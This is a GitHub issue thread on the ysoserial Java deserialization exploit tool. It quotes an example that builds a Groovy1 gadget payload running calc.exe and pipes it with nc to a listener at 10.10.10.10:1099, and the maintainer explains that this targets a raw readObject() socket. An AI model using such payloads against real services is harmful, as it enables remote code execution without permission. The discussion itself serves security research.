groovypayload.bin example question

frohoff / ysoserial

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

http://frohoff.github.io/appseccali-marshalling-pickles/

MIT License

7.77k stars 1.76k forks source link

groovypayload.bin example question #175

Closed ivantsyba closed 2 years ago

ivantsyba commented 2 years ago

In this example:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin

Do you need to convince exploited jvm to load Groovy1 class from 10.10.10.10:1099 via RMI to make all this work?

frohoff commented 2 years ago

No this is an example of exploiting a simple TCP listener that does just a readObject() from an ObjectInputStream that wraps the TCP steam (terrible idea).

Example here https://stackoverflow.com/questions/7022063/java-listening-to-a-socket-with-objectinputstream.